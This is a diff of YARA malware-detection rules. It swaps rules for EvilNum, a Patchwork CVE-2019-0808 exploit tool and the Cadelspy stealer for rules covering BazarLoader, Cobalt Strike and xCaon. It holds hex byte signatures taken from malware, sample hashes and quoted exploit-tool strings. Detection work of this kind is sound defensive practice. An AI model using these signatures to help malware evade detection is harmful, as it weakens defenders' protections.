+		hash1 = "6a0449a0b92dc1b17da219492487de824e86a25284f21e6e3af056fe3f4c4ec0"
+		hash2 = "bdf3d5f4f1b7c90dfc526340e917da9e188f04238e772049b2a97b4f88f711e3"
 		tlp = "white"
-		adversary = "EvilNum"
+		adversary = "-"
+		level = "experimental"
 
 	strings:
-		$s1 = "1-5-21-669817101-1001941732-3035937113-1000" fullword wide
-		$s2 = "*..\\..\\..\\..\\..\\..\\Windows\\System32\\cmd.exe" fullword wide
-		$s3 = "C:\\Windows\\System32\\cmd.exe" fullword wide
-		$s4 = "System32 (C:\\Windows)" fullword wide
-		$s5 = { 3d 00 25 00 74 00 6d 00 70 00 25 00 5c 00 74 00 65 00 73 00 74 00 2e 00 63 00 26 }
-		$s6 = { 3c 00 22 00 25 [5] 25 00 6d 00 64 00 22 00 26 00 6e 00 65 00 74 00 73 00 74 00 61 00 74 00 20 00 2d }
-		$s7 = { 43 00 3a 00 5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 20 00 46 00 69 00 6c 00 65 00 73 00 5c 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 20 00 4e 00 54 00 5c 00 41 00 63 00 63 00 65 00 73 00 73 00 6f 00 72 00 69 00 65 00 73 00 5c 00 77 00 6f 00 72 00 64 00 70 00 61 00 64 00 2e 00 65 00 78 00 65 }
+		$s1 = { 49 3b 66 10 76 ?? 48 83 ec ?? 48 89 6c 24 ?? 48 8d 6c 24 ?? 48 8b [3] 48 }
+		$s2 = { 48 89 f8 48 89 f3 48 83 ec 27 48 83 e4 f0 48 89 44 24 10 48 89 5c 24 18 48 8d 3d 41 [2] 00 48 8d 9c 24 68 00 ff ff 48 89 5f 10 48 89 5f 18 48 89 1f 48 89 67 08 b8 00 00 00 00 0f a2 89 c6 83 f8 00 74 33 81 fb 47 65 6e 75 75 1e 81 fa 69 6e 65 49 75 16 81 f9 6e 74 65 6c 75 0e c6 05 [3] 00 01 c6 05 [3] 00 01 b8 01 00 00 00 0f a2 89 05 [3] 00 48 8b 05 }
+		$s3 = { 66 0f 38 dc ?? 66 0f 38 dc ?? 66 0f 38 dc ?? 66 0f 38 dc ?? 66 0f 38 dc ?? 66 0f 38 dc }
+		$s4 = { 00 00 48 8b ac 24 68 02 00 00 48 81 c4 70 02 00 00 c3 ?? 80 ?? 0e [6] 48 8b [2] 48 }
 
 	condition:
-		filesize > 60KB and 6 of ( $s* )
+		uint32( 0 ) == 0x464C457F and filesize > 20KB and all of ( $s* )
 }
-rule ARKBIRD_SOLG_APT_Evilnum_JS_Jul_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Bazarloader_Oct_2021_1 : FILE
 {
 	meta:
-		description = "Detect JS script used by EvilNum group"
+		description = "Detect BazarLoader implant"
 		author = "Arkbird_SOLG"
-		id = "08b410c4-4899-5280-9735-6b3017c7a813"
-		date = "2020-07-13"
-		modified = "2021-07-14"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-13/EvilNum/APT_EvilNum_JS_Jul_2021_1.yara#L1-L22"
+		id = "d6462e74-fe1d-599e-aac8-0d0942ca42ad"
+		date = "2021-10-30"
+		modified = "2021-10-30"
+		reference = "https://twitter.com/malwrhunterteam/status/1454154412902002692"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-10-29/Hive/MAL_BazarLoader_Oct_2021_1.yara#L1-L17"
 		license_url = "N/A"
-		logic_hash = "0ace40e54f6dca078f17e7e157c7973642b83366ba792d2bcdc0d971f729fb68"
+		logic_hash = "afbe02ef9e69ac5105aaae28240d6863c9c4578c0e8fd7c86c38d975cf8acdc6"
 		score = 75
-		quality = 69
+		quality = 75
 		tags = "FILE"
-		hash1 = "8420577149bef1eb12387be3ea7c33f70272e457891dfe08fdb015ba7cd92c72"
-		hash2 = "c16824a585c9a77332fc16357b5e00fc110c00535480e9495c627f656bb60f24"
-		hash3 = "1061baf604aaa7ed5ba3026b9367de7b6c7f20e7e706d9e9b5308c45a64b2679"
+		hash1 = "0ba7554e7d120ce355c6995c6af95542499e4ec2f6012ed16b32a85175761a94"
+		hash2 = "2b29c80a4829d3dc816b99606aa5aeead3533d24137f79b5c9a8407957e97b10"
 		tlp = "white"
-		adversary = "EvilNum"
+		adversary = "-"
 
 	strings:
-		$s1 = { 57 53 63 72 69 70 74 2e 43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 4d 53 58 6d 6c 32 2e 44 4f 4d 44 6f 63 75 6d 65 6e 74 22 29 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 42 61 73 65 36 34 44 61 74 61 22 29 3b }
-		$s2 = { 57 53 63 72 69 70 74 2e 43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 4d 53 58 6d 6c 32 2e 44 4f 4d 44 6f 63 75 6d 65 6e 74 22 29 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 42 61 73 65 36 34 44 61 74 61 22 29 3b }
-		$s3 = { 69 66 20 28 2d 31 20 21 3d 20 57 53 63 72 69 70 74 2e 53 63 72 69 70 74 46 75 6c 6c 4e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 [1-8] 28 22 }
-		$s4 = { 52 75 6e 28 [1-8] 30 2c 20 30 29 }
-		$s5 = { 7d 2c 20 ?? 20 3d 20 ?? 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 2c 20 ?? 20 3d 20 ?? 2e 73 6c 69 63 65 28 31 2c 20 31 20 2b 20 ?? 29 2c 20 ?? 20 3d 20 ?? 2e 73 6c 69 63 65 28 31 20 2b 20 ?? 20 2b 20 34 29 2c 20 ?? 20 3d 20 5b 5d 2c }
-		$s6 = { 57 53 63 72 69 70 74 2e 43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 41 44 4f 44 42 2e 53 74 72 65 61 6d 22 29 3b }
-		$s7 = { 5b ?? 5d 20 3d 20 ?? 20 2b 20 22 2d 22 20 2b 20 ?? 20 2b 20 22 2d 22 20 2b 20 ?? 20 2b 20 22 54 22 20 2b 20 ?? 20 2b 20 22 3a 22 20 2b 20 ?? 20 2b 20 22 3a 22 20 2b 20 ?? 3b }
+		$s1 = { 48 8b 44 24 60 c6 80 38 01 00 00 01 48 8b 44 24 60 c6 80 39 01 00 00 02 48 8b 44 24 60 c7 40 5c 03 00 00 00 b8 60 00 00 00 48 6b c0 00 48 8b 4c 24 60 48 03 41 68 48 89 44 24 20 48 8b 44 24 20 c7 00 01 00 00 00 48 8b 44 24 20 c7 40 08 02 00 00 00 48 8b 44 24 20 c7 40 0c 02 00 00 00 48 8b 44 24 20 c7 40 10 00 00 00 00 48 8b 44 24 20 c7 40 14 00 00 00 00 48 8b 44 24 20 c7 40 18 00 00 00 00 b8 60 00 00 00 48 6b c0 01 48 8b 4c 24 60 48 03 41 68 48 89 44 24 20 48 8b 44 24 20 c7 00 22 00 00 00 48 8b 44 24 20 c7 40 08 01 00 00 00 48 8b 44 24 20 c7 40 0c 01 00 00 00 48 8b 44 24 20 c7 40 10 01 00 00 00 48 8b 44 24 20 c7 40 14 01 00 00 00 48 8b 44 24 20 c7 40 18 01 00 00 00 b8 60 00 00 00 48 6b c0 02 48 8b 4c 24 60 48 03 41 68 48 89 44 24 20 48 8b 44 24 20 c7 00 23 00 00 00 48 8b 44 24 20 c7 40 08 01 00 00 00 48 8b 44 24 20 c7 40 0c 01 00 00 00 48 8b 44 24 20 c7 40 10 01 00 00 00 48 8b 44 24 20 c7 40 14 01 00 00 00 48 8b 44 24 20 c7 40 18 01 }
+		$s2 = { 48 8b 44 24 50 48 8b 00 c7 40 28 10 00 00 00 48 8b 44 24 50 48 8b 00 b9 04 00 00 00 48 6b c9 00 48 8b 54 24 50 8b 92 18 01 00 00 89 54 08 2c 48 8b 44 24 50 48 8b 00 48 8b 4c 24 50 ff 10 48 8b 4c 24 50 e8 80 f8 ff ff 48 8b 4c 24 50 e8 c6 fe ff ff 48 8b 44 24 50 83 78 78 00 76 16 48 8b 44 24 50 83 78 74 00 76 0b 48 8b 44 24 50 83 78 7c 00 7f 1e 48 8b 44 24 50 48 8b 00 c7 40 28 21 00 00 00 48 8b 44 24 50 48 8b 00 48 8b 4c 24 50 ff 10 48 8b 44 24 50 48 8b 4c 24 50 8b 40 74 0f af 41 7c 89 44 24 24 8b 44 24 24 89 44 24 34 8b 44 24 24 39 44 24 34 74 1e 48 8b 44 24 50 48 8b 00 c7 40 28 48 00 00 00 48 8b 44 24 50 48 8b 00 48 8b 4c 24 50 ff 10 48 8b 44 24 38 c7 40 18 00 00 00 00 48 8b 4c 24 50 e8 0c fc ff ff 48 8b 4c 24 38 88 41 1c 48 8b 44 24 38 48 c7 40 20 00 00 00 00 48 8b 44 24 38 48 c7 40 28 00 00 00 00 48 8b 44 24 50 0f b6 40 62 85 c0 74 0d 48 8b 44 }
+		$s3 = { 48 8b 84 24 c0 00 00 00 8b 80 64 01 00 00 39 44 24 30 0f 8d 82 00 00 00 48 63 44 24 30 48 8b 8c 24 c0 00 00 00 48 8b 84 c1 68 01 00 00 48 89 44 24 58 48 8b 44 24 38 48 8b 4c 24 58 8b 40 10 0f af 41 0c 48 8b 4c 24 58 48 63 49 04 48 8b 94 24 c0 00 00 00 48 8b 52 08 48 89 54 24 70 c6 44 24 20 00 4c 8b 44 24 58 45 8b 48 0c 44 8b c0 48 8b 44 24 38 48 8b 54 c8 70 48 8b 8c 24 c0 00 00 00 48 8b 44 24 70 ff 50 40 48 63 4c 24 30 48 89 84 cc 80 00 00 00 e9 5c ff ff ff 48 8b 44 24 38 8b 40 18 89 44 24 40 eb 0a 8b 44 24 40 ff c0 89 44 24 40 48 8b 44 24 38 8b 40 1c 39 44 24 40 0f 8d af 01 00 00 48 8b 44 24 38 8b 40 14 89 44 24 44 eb 0a 8b 44 24 44 ff c0 89 44 24 44 48 8b 84 24 c0 00 00 00 8b 80 88 01 00 00 39 44 24 44 0f 83 6e 01 00 00 c7 44 24 50 00 00 00 00 c7 44 24 30 00 00 00 00 eb 0a 8b 44 24 30 ff c0 89 44 24 30 48 8b 84 24 c0 00 00 00 8b 80 64 01 00 00 39 44 24 30 0f 8d e2 00 00 00 48 63 44 24 30 48 8b 8c 24 c0 00 00 00 48 8b 84 c1 68 01 00 00 48 89 44 24 58 48 8b 44 24 58 8b 4c 24 44 0f af 48 38 8b c1 89 44 24 60 c7 44 24 48 00 00 00 00 eb 0a 8b 44 24 48 ff c0 89 44 24 48 48 8b }
 
 	condition:
-		filesize > 8KB and 6 of ( $s* )
+		uint16( 0 ) == 0x5A4D and filesize > 200KB and all of ( $s* )
 }
-
-rule ARKBIRD_SOLG_APT_Patchwork_Tool_CVE_2019_0808_1 : FILE
+rule ARKBIRD_SOLG_MAL_Cobaltstrike_Oct_2021_1 : FILE
 {
 	meta:
-		description = "Detect CVE 2019-0808 tool used by Patchwork group"
+		description = "Detect Cobalt Strike implant"
 		author = "Arkbird_SOLG"
-		id = "169255fe-dd7a-5a4e-8f0f-d84a0cf5c684"
-		date = "2020-08-27"
-		modified = "2021-07-13"
-		reference = "https://blog.exodusintel.com/2019/05/17/windows-within-windows/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-08-27/APT_Patchwork_Tool_CVE_2019_0808_1.yar#L3-L34"
+		id = "89d46993-cc1b-536b-b1ab-a0e967d0d397"
+		date = "2021-10-30"
+		modified = "2021-10-30"
+		reference = "https://twitter.com/malwrhunterteam/status/1454154412902002692"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-10-29/Hive/MAL_CobaltStrike_Oct_2021_1.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "e66df5d69d64c00cb68ff7bea0f7a7eec6657aff83d0f6cdb48d908bae8bcec8"
-		score = 50
+		logic_hash = "4f1a2306b8279be67829d0d515063caae6a9d7a07078a43c2cbe62f675bcb450"
+		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "49f8a9203e5055777a67490923243405b9aa519016645fd75731c53cbf02073c"
-		level = "Experimental"
+		hash1 = "f520f97e3aa065efc4b7633735530a7ea341f3b332122921cb9257bf55147fb7"
+		hash2 = "7370c09d07b4695aa11e299a9c17007e9267e1578ce2753259c02a8cf27b18b6"
+		hash3 = "bfbc1c27a73c33e375eeea164dc876c23bca1fbc0051bb48d3ed3e50df6fa0e8"
+		tlp = "white"
+		adversary = "-"
 
 	strings:
-		$asm1 = { 8b 3d 44 21 01 10 6a 00 6a 00 6a 01 6a 01 6a 00 6a 00 68 00 00 00 08 68 e4 7e 01 10 68 e8 7e 01 10 6a 00 ff d7 50 68 f0 7e 01 10 a3 c8 a2 01 10 e8 e8 f7 ff ff 8b 35 68 21 01 10 8d 84 24 5c 01 00 00 83 c4 08 c7 84 24 54 01 00 00 1c 00 00 00 0f 57 c0 c7 84 24 58 01 00 00 10 00 00 00 66 0f 13 84 24 60 01 00 00 66 0f 13 84 24 68 01 00 00 50 ff b4 24 1c 01 00 00 c7 84 24 64 01 00 00 00 00 00 60 ff d6 8d 84 24 54 01 00 00 50 ff 74 24 10 ff d6 8b 35 5c 21 01 10 68 04 7f 01 10 ff 74 24 10 68 10 04 00 00 ff b4 24 24 01 00 00 ff }
-		$asm2 = { a1 14 21 01 10 0f 57 c0 8b 74 24 08 89 84 24 28 01 00 00 8d 84 24 20 01 00 00 50 c7 84 24 28 01 00 00 00 00 00 00 66 0f 13 84 24 3c 01 00 00 c7 84 24 44 01 00 00 00 00 00 00 c7 84 24 50 01 00 00 00 00 00 00 c7 84 24 24 01 00 00 30 00 00 00 c7 84 24 30 01 00 00 00 00 00 00 c7 84 24 34 01 00 00 00 00 00 00 89 b4 24 38 01 00 00 c7 84 24 48 01 00 00 00 00 00 00 c7 84 24 4c 01 00 00 10 7f 01 10 ff 15 64 21 01 10 6a 00 56 6a 00 6a 00 6a 01 6a 01 6a 00 6a 00 68 00 00 00 08 68 20 7f 01 10 68 10 7f 01 10 6a 00 ff d7 6a 00 50 6a 00 6a 00 a3 ec a2 01 10 6a 00 ff b4 24 2c 01 00 00 ff 15 58 21 01 }
-		$asm3 = { e8 72 fb ff ff 83 c4 08 68 c0 13 00 10 6a fc ff 76 0c ff 15 54 21 01 10 56 ff 75 0c ff 75 08 6a 00 ff 15 24 21 01 10 5f 5e 5b 5d }
-		$s1 = "[*] Successfully exploited CVE-2019-0808 and triggered the shellcode!" fullword ascii
-		$s2 = "[!] Failed to find the address of IsMenu within user32.dll." fullword ascii
-		$s3 = "Sending hSecondaryWindow a WM_ENTERIDLE message to trigger the execution of the shellcode as SYSTEM." fullword ascii
-		$s4 = "AppPolicyGetProcessTerminationMethod" fullword ascii
-		$s5 = "[*] Found target windows!" fullword ascii
-		$s6 = "[*] addressOfIsMenuFromStartOfUser32: 0x%08X" fullword ascii
-		$s7 = "[*] FakeMenu: %p" fullword ascii
-		$s8 = "[*] Primary window address: 0x%08X" fullword ascii
-		$s9 = "[!] Didn't exploit the program. For some reason our privileges were not appropriate." fullword ascii
-		$s10 = "[*] hUser32: 0x%08X" fullword ascii
-		$s11 = "[*] Secondary window address: 0x%08X" fullword ascii
-		$s12 = "[*] Offset: 0x%08X" fullword ascii
-		$s13 = "[*] pHmValidateHandle: 0x%08X" fullword ascii
-		$s14 = "[*] HWND: %p " fullword ascii
-		$s15 = "[*] pIsMenuFunction: 0x%08X" fullword ascii
-		$s16 = "[*] Destroyed spare windows!" fullword ascii
-		$s17 = "[!] SetWindowLongA malicious error: 0x%08X" fullword ascii
+		$s1 = { 48 83 ec 10 4c 89 14 24 4c 89 5c 24 08 4d 33 db 4c 8d 54 24 18 4c 2b d0 4d 0f 42 d3 65 4c 8b 1c 25 10 00 00 00 4d 3b d3 f2 73 17 66 41 81 e2 00 f0 4d 8d 9b 00 f0 ff ff 41 c6 03 00 4d 3b d3 f2 75 ef 4c 8b 14 24 4c 8b 5c 24 08 48 83 c4 10 f2 c3 }
+		$s2 = { 89 ?? 24 ?? 8b ?? 24 0c 89 ?? 24 ?? 8b ?? 24 ?? c1 ?? 0d 89 ?? 24 0c 48 8b ?? 24 10 89 ?? 24 [2] 8b ?? 24 10 }
+		$s3 = { b8 10 00 00 00 48 89 45 ?? e8 [3] 00 48 29 c4 48 89 e0 48 8b 4d ?? 48 89 45 ?? 48 89 c8 e8 [3] 00 48 29 c4 48 89 e0 48 8b 4d ?? 48 89 45 ?? 48 89 c8 e8 [3] 00 48 29 c4 48 89 e0 48 8b 4d ?? 48 89 45 ?? 48 89 c8 e8 [3] 00 48 29 c4 48 89 e0 48 8b 4d ?? 48 89 45 ?? 48 89 c8 e8 [3] 00 48 29 c4 48 89 e0 48 8b 4d ?? 8b 55 f8 89 11 4c 8b 45 ?? 4c 8b 4d f0 4d 89 08 4c 8b 55 ?? 4c 8b 5d e8 4d 89 1a 48 8b 75 ?? 48 8b 7d e0 48 89 3e c7 00 ?? 00 00 00 48 8b 05 [3] 00 48 05 [2] 00 00 8b 19 4d 8b 00 4d 8b 32 48 8b 0e 48 83 ec 20 4c 89 f2 41 89 d9 ff d0 48 83 c4 20 ?? 45 }
+		$s4 = { 48 83 ec 48 44 89 4c 24 44 4c 89 44 24 38 48 89 54 24 30 48 89 4c 24 28 c7 44 24 24 ?? 00 00 00 48 8b 05 [3] 00 48 05 [2] 00 00 44 8b 4c 24 44 4c 8b 44 24 38 48 8b 54 24 30 48 8b 4c 24 28 ff d0 90 48 83 c4 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 70KB and ( pe.imphash ( ) == "d4a5e8c255211639195793920eeda70f" and 2 of ( $asm* ) and 12 of ( $s* ) )
+		uint16( 0 ) == 0x5A4D and filesize > 20KB and 3 of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_Cadelspy_Stealer_May_2021_1 : FILE
+rule ARKBIRD_SOLG_Mal_Xcaon_Jul_2021_1 : FILE
 {
 	meta:
-		description = "Detect Cadelspy stealer"
+		description = "Detect the xCaon malware"
 		author = "Arkbird_SOLG"
-		id = "bac23ed9-f51c-546e-8f4e-320d33b51829"
-		date = "2021-05-30"
-		modified = "2021-06-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-30/APT39/MAL_Cadelspy_Stealer_May_2021_1.yara#L1-L24"
+		id = "bcd5a52d-9547-5709-95f4-9d1f956f623c"
+		date = "2021-07-01"
+		modified = "2021-07-02"
+		reference = "https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-02/IndigoZebra/Mal_xCaon_Jul_2021_1.yara#L1-L21"
 		license_url = "N/A"
-		logic_hash = "29fade3703c55bd16e67f9bf126cb0d8a06bc0eafe10e145f8d57d8c4abe5656"
+		logic_hash = "9c3e3d0035596323a505404ecc067bd2b87a4b0ac7499f1c87aac015f59eb65a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "8847a73bbd9477be60685ce8ec8333db933892f4d7b729fcef01ac76600de9ff"
-		hash2 = "f3b0ad96c8529399bd7117bd67cdf0297191476d3a81a60b147960306ae5f068"
-		hash3 = "88c947d0d0fddd1ea87f5b85982cf231c9c56e4f5e25fac405f608a1c28d8391"
+		hash1 = "8be3b10406f690ae5cf46c1dba18cb9a1c75bf646defcc9cab81d40fe0e0cc1b"
+		hash2 = "e9013f35ce11fc4c5eb2c21827bdc459202d362365d6ea5b724dee4fe0088bd1"
+		hash3 = "489fca69a622195328302e64e29b6183feac90826dce198432d603202ca4d216"
 		tlp = "White"
-		adversary = "APT39"
+		adversary = "IndigoZebra"
 
 	strings:
-		$str1 = "C:\\Windows\\SysEvent.exe" fullword wide
-		$str2 = "\\sysprep\\sysprep.exe" fullword wide
-		$str3 = "Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}" fullword wide
-		$str4 = "@C:\\Windows\\systemw.dll" fullword wide
-		$str5 = "systemw.dll" fullword ascii
-		$str6 = "ApAshell32.dll" fullword wide
-		$seq1 = { 55 8b ec 83 ec 14 a1 04 00 41 00 33 c5 89 45 fc 8d 45 f8 c7 45 f0 00 00 00 00 50 6a 00 6a 00 6a 00 6a 00 6a 00 6a 00 68 20 02 00 00 6a 20 6a 02 8d 45 f0 66 c7 45 f4 00 05 50 ff 15 08 30 40 00 85 c0 74 25 8d 45 ec 50 ff 75 f8 6a 00 ff 15 04 30 40 00 ff 75 f8 f7 d8 1b c0 21 45 ec ff 15 00 30 40 00 83 7d ec 00 75 05 e8 52 fd ff ff 56 68 2d 02 00 00 ff 15 30 30 40 00 68 1c 33 40 00 ff 15 20 30 40 00 6a 00 6a 00 6a 01 6a 00 6a 00 6a 02 68 1c 33 40 00 89 45 f8 ff 15 1c 30 40 00 6a 00 8b f0 8d 45 f8 50 68 00 ba 00 00 68 68 33 40 00 56 ff 15 6c 30 40 00 56 ff 15 74 30 40 00 6a 01 6a 00 6a 00 68 1c 33 40 00 68 4c 33 40 00 6a 00 ff 15 b0 30 40 00 8b 4d fc 33 c0 33 cd 5e e8 06 00 00 00 }
-		$seq2 = { 8b 0d 10 32 40 00 0f 10 05 24 32 40 00 89 08 8b 0d 14 32 40 00 89 48 04 8b 0d 18 32 40 00 89 48 08 8b 0d 1c 32 40 00 89 48 0c 66 8b 0d 20 32 40 00 66 89 48 10 33 c9 a1 3c 32 40 00 0f 11 84 24 34 04 00 00 89 84 24 4c 04 00 00 f3 0f 7e 05 34 32 40 00 66 0f d6 84 24 44 04 00 00 0f 1f 40 00 0f b7 84 0c c8 0f 00 00 8d 49 02 66 89 84 0c 42 08 00 00 66 85 c0 75 e8 8d bc 24 44 08 00 00 83 c7 fe 66 8b 47 02 83 c7 02 66 85 c0 75 f4 b9 0a 00 00 00 be 40 32 40 00 f3 a5 b9 21 00 00 00 0f 10 05 58 33 40 00 66 a5 8d bc 24 54 0c 00 00 be 70 32 40 00 f3 a5 66 a5 0f 11 84 24 5c 0e 00 00 0f 10 05 78 ed 40 00 0f 11 84 24 6c 0e 00 00 0f 10 05 68 ed 40 00 0f 11 84 24 7c 0e 00 00 38 45 08 75 1f 8d 44 24 10 50 e8 23 fa ff ff 5f 5e 5b 8b 8c 24 c8 11 00 00 33 cc e8 1c 04 00 00 8b }
-		$seq3 = { 8b 84 b5 e4 d9 ff ff 85 c0 74 66 50 6a 00 68 ff ff 1f 00 ff 15 28 30 40 00 8b f8 85 ff 74 52 8d 85 dc d9 ff ff 50 6a 04 8d 85 d0 d9 ff ff 50 57 ff 15 64 30 40 00 85 c0 74 32 68 04 01 00 00 8d 85 ec fb ff ff 50 ff b5 d0 d9 ff ff 57 ff 15 34 30 40 00 8d 85 ec fb ff ff 68 f8 32 40 00 50 ff 15 38 31 40 00 83 c4 08 85 c0 74 21 57 ff d3 33 ff 8b 85 e0 d9 ff ff 46 c1 e8 02 8b cf 3b f0 0f 82 7b ff ff ff 85 c9 0f 84 43 01 00 00 68 04 01 00 00 8d 85 e4 f9 ff ff 50 6a 00 ff 15 3c 30 40 00 85 c0 0f 84 24 01 00 00 8d 85 f4 fd ff ff 50 68 04 01 00 00 ff 15 14 30 40 00 8d 85 f4 fd ff ff 50 6a 00 68 14 33 40 00 50 ff 15 60 30 40 00 6a 00 8d 85 f4 fd ff ff 50 8d 85 e4 f9 ff ff 50 ff 15 58 30 40 00 85 c0 0f 84 df 00 00 00 6a 00 6a 00 6a 03 6a 00 6a 00 68 00 00 00 c0 8d 85 f4 fd ff ff 50 ff 15 1c 30 40 00 8b f0 83 fe ff 0f 84 b8 00 00 00 6a 00 8d 85 d8 d9 ff ff 50 68 00 10 00 00 8d 85 e4 e9 ff ff 50 56 ff 15 78 30 40 00 85 }
+		$s1 = { a1 7c 10 41 00 33 c5 89 45 fc 8b 45 08 56 57 6a 49 89 85 f8 80 ff ff 58 6a 50 66 89 45 c8 58 6a 48 66 89 45 ca 58 6a 4c 66 89 45 cc 58 6a 50 66 89 45 ce 58 6a 41 66 89 45 d0 58 6a 50 66 89 45 d2 58 6a 49 66 89 45 d4 58 6a 2e 66 89 45 d6 58 6a 44 66 89 45 d8 58 66 89 45 da 6a 4c 58 66 89 45 dc 66 89 45 de 33 c0 66 89 45 e0 8d 45 c8 50 c7 45 e4 47 65 74 41 c7 45 e8 64 61 70 74 c7 45 ec 65 72 73 49 c7 45 f0 6e 66 6f 00 ff 15 50 d0 40 00 8d 4d e4 51 50 89 85 f4 80 ff ff ff 15 54 d0 40 00 8d 8d f0 80 ff ff 51 8d 8d fc 80 ff ff 51 c7 85 f0 80 ff ff 90 7e 00 00 ff d0 8b c8 33 c0 c6 45 f4 00 8d 7d f5 ab 66 ab aa 85 c9 0f 85 1d 01 00 00 53 6a 25 5e 6a 30 5a 6a 32 59 8b c6 66 89 45 8c 8b c2 66 89 45 8e 6a 58 8b c1 66 89 45 90 58 8b f8 6a 2d 66 89 7d 92 5f 8b df 66 89 5d 94 8b de 66 89 5d 96 8b da 66 89 5d 98 8b d9 66 89 5d 9a 8b d8 66 89 5d 9c 8b df 66 89 5d 9e 8b de 66 89 5d a0 8b da 66 89 5d a2 8b d9 66 89 5d a4 8b d8 66 89 5d a6 8b df 66 89 5d a8 8b de 66 89 5d aa 8b da 66 89 5d ac 8b d9 66 89 5d ae 8b d8 66 89 5d b0 8b df 66 89 5d b2 8b de 66 89 5d b4 8b da 66 89 5d b6 8b d9 66 89 45 c4 66 89 5d b8 8b d8 33 c0 66 89 45 c6 6a 06 8d 85 90 82 ff ff 50 8d 45 f4 50 66 89 5d ba 66 89 7d bc 66 89 75 be 66 89 55 c0 66 89 4d c2 e8 ?? 17 00 00 0f b6 45 f9 50 0f b6 45 f8 50 0f b6 45 f7 50 0f b6 45 f6 50 0f b6 45 f5 50 0f b6 45 f4 50 8d 45 8c 50 ff b5 f8 80 ff ff ff 15 44 d1 40 00 83 c4 2c 33 f6 46 5b ff b5 f4 80 ff ff ff 15 4c d0 40 00 8b }
+		$s2 = { 6a 5b 58 6a 55 66 89 45 c4 58 6a 70 66 89 45 c6 58 6a 6c 66 89 45 c8 58 6a 6f 66 89 45 ca 58 6a 61 66 89 45 cc 58 6a 64 66 89 45 ce 58 6a 5d 66 89 45 d0 58 6a 0d 66 89 45 d2 58 6a 0a 66 89 45 d4 58 6a 25 66 89 45 d6 33 c0 66 89 45 d8 58 6a 74 66 89 45 ac 8b c6 66 89 45 ae 58 6a 6d 66 89 45 b0 58 6a 70 66 89 45 b2 58 6a 25 66 89 45 b4 58 6a 64 66 89 45 b6 58 6a 2e 66 89 45 b8 58 6a 6c 66 89 45 ba 58 6a 6f 66 89 45 bc 58 6a 67 66 89 45 be 58 6a 46 66 89 45 c0 33 c0 66 89 45 c2 58 6a 69 66 89 45 dc 58 6a 6c 66 89 45 de 58 6a 65 66 89 45 e0 58 6a 3a 66 89 45 e2 58 66 89 45 e4 6a 25 58 66 89 45 e6 6a 0d 58 66 89 45 ea 6a 0a 58 66 89 45 ec 33 c0 66 89 45 ee 8d 45 c4 50 66 89 75 e8 e8 ?? 11 00 00 59 8d 4d c4 8d b5 50 f3 ff ff e8 [2] ff ff 89 bd 4c f2 ff ff c7 85 48 f3 ff ff 0f 00 00 00 89 bd 44 f3 ff ff c6 85 34 f3 ff ff 00 8d 85 34 f3 ff ff 50 83 ec 1c c6 45 fc 03 8d 85 fc f2 ff ff 8b f4 89 a5 50 f2 ff ff 50 e8 [2] ff ff e8 [2] ff ff 8b 9d 34 f3 ff ff 83 c4 20 83 bd 48 f3 ff ff 10 73 06 8d 9d 34 f3 ff ff 8d 85 4c f2 ff ff 50 }
+		$s3 = { 83 c4 10 8d 85 6c fb ff ff 50 68 04 01 00 00 ff 15 2c d0 40 00 33 c0 56 66 89 85 74 fd ff ff 8d 85 76 fd ff ff 53 50 e8 ?? 10 00 00 83 c4 0c ff 15 30 d0 40 00 8b 35 44 d1 40 00 50 8d 85 6c fb ff ff 50 8d 45 ac 50 8d 85 74 fd ff ff 50 ff d6 83 c4 10 53 68 80 00 00 00 6a 02 53 53 68 00 00 00 40 8d 85 74 fd ff ff 50 ff 15 24 d0 40 00 8b f8 83 ff ff 74 79 53 8d 85 50 f2 ff ff 50 ff b5 4c f2 ff ff 89 9d 50 f2 ff ff ff b5 48 f2 ff ff 57 ff 15 14 d0 40 00 57 ff 15 34 d0 40 00 33 c0 68 fe 07 00 00 66 89 85 6c f3 ff ff 8d 85 6e f3 ff ff 53 50 e8 ?? 10 00 00 8d 85 74 fd ff ff 50 8d 45 dc 50 8d 85 6c f3 ff ff 50 ff d6 8d 85 6c f3 ff ff 50 8d 85 18 f3 ff ff 50 8d 8d 50 f3 ff ff e8 [2] ff ff 83 }
